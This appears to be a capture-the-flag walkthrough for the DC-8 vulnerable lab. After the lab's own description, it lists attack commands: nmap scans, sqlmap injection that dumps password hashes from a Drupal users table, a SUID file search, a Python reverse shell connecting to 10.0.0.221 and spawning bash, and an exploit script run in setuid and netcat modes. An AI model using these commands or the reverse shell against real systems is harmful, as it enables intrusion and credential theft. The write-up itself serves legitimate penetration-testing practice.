DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of concept" as to whether two-factor authentication installed and configured on Linux can prevent the Linux server from being exploited. The "proof of concept" portion of this challenge eventuated as a result of a question being asked about two-factor authentication and Linux on Twitter, and also due to a suggestion by @theart42. The ultimate goal of this challenge is to bypass two-factor authentication, get root and to read the one and only flag. You probably wouldn't even know that two-factor authentication was installed and configured unless you attempt to login via SSH, but it's definitely there and doing it's job. Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools. For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
#ping扫描网段内的主机 nmap -sP 10.0.0.0/24 #扫描主机端口 nmap -sV -p- 10.0.0.24
sqlmap -u 'http://10.0.0.24/?nid=2%27' sqlmap -u 'http://10.0.0.24/?nid=2%27' -D d7db -T users -C name,pass --dump
find / -perm -u=s -type f 2>/dev/null
#python文件 import os,socket,subprocess s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('10.0.0.221',1234)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/bash','-i']) #执行文件 python /tmp/reverse.py
./exp.sh -m setuid ./exp.sh -m netcat